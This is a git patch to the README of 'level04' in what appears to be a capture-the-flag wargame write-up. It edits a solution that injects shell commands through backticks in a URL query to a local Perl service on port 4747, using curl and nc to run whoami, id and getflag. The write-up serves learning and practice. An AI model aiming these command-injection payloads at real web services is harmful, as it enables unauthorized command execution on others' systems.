From 59a145806b4fe99f9aa8ac33931f24c702833b13 Mon Sep 17 00:00:00 2001
From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com>
Date: Tue, 19 Nov 2024 12:41:09 +0100
Subject: [PATCH] Update README.mdx

---
 level04/README.mdx | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/level04/README.mdx b/level04/README.mdx
index f6416a7..ef2351b 100644
--- a/level04/README.mdx
+++ b/level04/README.mdx
@@ -41,12 +41,13 @@ Solution
 - set the query payload and Perl will echo it
 ```b
+> curl -I localhost:4747
+or
 > nc -vz localhost 4747
 ^ v: verbose z: scan if a port is open (a listening daemon)
 Connection to localhost 4747 port [tcp/*] succeeded!
-
 # eg.
 > curl localhost:4747/?x="\`/usr/bin/whoami\`"
 > curl localhost:4747/?x="\`/usr/bin/id\`"
@@ -55,12 +56,13 @@ Connection to localhost 4747 port [tcp/*] succeeded!
 > curl localhost:4747/?x="\`/bin/df\`"
-# avoid typing realpath out
+# whereis or which : avoid typing realpath out
 > curl localhost:4747/?x="\`$(whereis pwd|awk '{print $2}')\`"
-or
 > curl localhost:4747/?x="\`$(which pwd)\`"
 🟢 # solve
 > curl localhost:4747/?x="\`$(which getflag)\`"
+or
+> echo -e "GET /?x=\`$(which getflag)\` HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 4747
 ```